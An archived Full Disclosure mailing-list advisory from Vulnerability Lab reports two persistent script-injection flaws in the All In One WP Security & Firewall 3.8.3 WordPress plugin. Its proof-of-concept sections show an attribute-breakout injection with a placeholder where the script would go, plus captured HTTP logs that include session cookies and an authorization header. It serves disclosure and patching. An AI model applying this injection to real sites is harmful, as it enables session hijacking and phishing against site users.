[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-09-30 14:39:46
Message-ID: 542AC0B2.6020403 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
Release Date:
=============
2014-09-29
Vulnerability Laboratory ID (VL-ID):
====================================
1327
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
WordPress itself is a very secure platform. However, it helps to add some extra security and \
firewall to your site by using a security plugin that enforces a lot of good security \
practices. The All In One WordPress Security plugin will take your website security to a whole \
new level. This plugin is designed and written by experts and is easy to use and understand. It \
reduces security risk by checking for vulnerabilities, and by implementing and enforcing the \
latest recommended WordPress security practices and techniques.
(Copy of the Vendor Homepage: \
https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the \
official All in One Security & Firewall v3.8.3 Wordpress Plugin.
Vulnerability Disclosure Timeline:
==================================
2014-09-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Github
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security \
and Firewall v3.8.3 Plugin. The vulnerability allows remote attackers to inject own malicious \
script codes to the application-side of the vulnerable service.
The first vulnerability is located in the 404 detection redirect url input field of the \
firewall detection 404 application module. Remote attackers are able to prepare malicious \
requests that inject own script codes to the application-side of the vulnerable service. The \
request method to inject is POST and the attack vector that exploits the issue location on the \
application-side (persistent). The attacker injects own script codes to the 404 detection \
redirect url input field and the execution occurs in the same section next to the input field \
context that gets displayed again.
The second vulnerability is location in the file name error logs url input field of the \
FileSystem Components > Host System Logs module. Remote attackers are able to prepare malicious \
requests that inject own script codes to the applicaation-side of the vulnerable service. The \
request method to inject is POST and the attack vector that exploits the issue location on the \
application-side (persistent). The attacker injects own script codes to the file name error \
logs url input field and the execution occurs in the same section next to the input field \
context that gets displayed again.
The security risk of the persistent POST inject vulnerability is estimated as medium with a \
cvss (common vulnerability scoring system) count of 3.2. Exploitation of the application-side \
web vulnerability requires no privileged web-application user account but low or medium user \
interaction. Successful exploitation of the vulnerability results in persistent phishing \
attacks, session hijacking, persistent external redirect to malicious sources and \
application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Vulnerable Parameter(s):
[+] 404 detection redirect url
[+] file name error logs url
Affected Module(s):
[+] Firewall - Detection 404
[+] FileSystem Components > Host System
Proof of Concept (PoC):
=======================
1.1
The first POST inject web vulnerability can be exploited by remote attackers without privileged \
application user account and with low or medium user interaction. For security demonstration \
or to reproduce the security vulnerability follow the provided information and steps below to \
continue.
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
<tr valign="top">
<th scope="row">404 Lockout Redirect URL:</th>
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\"
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 \
Lockout Redirect URL INPUT!]>" />
<span class="description">A blocked visitor will be automatically redirected to \
this URL.</span> </td>
</tr>
</table>
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" \
class="button-primary" />
</form>
</div></div>
<div class="postbox">
<h3><label for="title">404 Event Logs</label></h3>
<div class="inside">
<form id="tables-filter" method="post">
<!-- For plugins, we also need to ensure that the form posts back to our current \
page --> <input type="hidden" name="page" value="aiowpsec_firewall" />
<input type="hidden" name="tab" value="tab6" /> <!-- Now we \
can render the completed list table -->
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input \
type="hidden" name="_wp_http_referer" \
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">
<div class="alignleft actions">
<select name='action'>
<option value='-1' selected='selected'>Bulk Actions</option>
<option value='delete'>Delete</option>
</select>
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return \
confirm("Are you sure you want to perform this bulk operation on the selected entries?")" /> \
</div> <div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' \
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'> \
«</a> <a class='prev-page disabled' title='Go to the previous page' \
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
<span class="paging-input"><input class='current-page' title='Current page' type='text' \
name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span> <a \
class='next-page' title='Go to the next page' \
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
<a class='last-page' title='Go to the last page' \
href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'> \
»</a></span></div> <br class="clear" />
</div>
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime \
Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:21 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[8095]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
-
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE \
VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime \
Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:40:22 GMT]
Content-Type[text/html]
Content-Length[557]
Connection[keep-alive]
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
Etag["4ea065b-3c6-4dcad48e5901e"]
Accept-Ranges[bytes]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Powered-By[PleskLin]
Reference(s):
/wp-admin/admin.php?page=aiowpsec_firewall
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
1.2
The second POST inject web vulnerability can be exploited by remote attackers without \
privileged application user account and with low or medium user interaction. For security \
demonstration or to reproduce the security vulnerability follow the provided information and \
steps below to continue.
PoC: FileSystem Components > Host System Logs
<div class="inside">
<p>Please click the button below to view the latest system logs:</p>
<form action="" method="POST">
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
<input name="_wp_http_referer" \
value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden"> <div>Enter \
System Log File Name:
<input size="25" name="aiowps_system_log_file" \
value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
<span class="description">Enter your system log file name. (Defaults to \
error_log)</span> </div>
<div class="aio_spacer_15"></div>
<input name="aiowps_search_error_files" value="View Latest System Logs" \
class="button-primary search-error-files" type="submit"> <span style="display: none;" \
class="aiowps_loading_1">
<img \
src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" \
alt=""> </span>
</form>
</div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE \
LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Content-Length[109]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
interval[60]
_nonce[176fea481c]
action[heartbeat]
screen_id[wp-security_page_aiowpsec_filesystem]
has_focus[false]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:44 GMT]
Content-Type[application/json; charset=UTF-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
X-Robots-Tag[noindex]
x-content-type-options[nosniff]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Status: 200[OK]
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime \
Type[text/html] Request Header:
Host[www.vulnerability-db.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; \
wordpress_test_cookie=WP+Cookie+check; \
wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; \
wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26 \
m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; \
wp-settings-time-1=1411750846] Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
Connection[keep-alive]
Response Header:
Server[nginx]
Date[Fri, 26 Sep 2014 17:53:54 GMT]
Content-Type[text/html; charset=UTF-8]
Content-Length[6136]
Connection[keep-alive]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
X-Powered-By[PleskLin]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input \
context in the file system security module. The second issue can be patched by a secure encode \
and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module. \
Restrit the input and handle malicious context with a own secure eception handling to prevent \
further POSt injection attacks.
Security Risk:
==============
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated \
as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic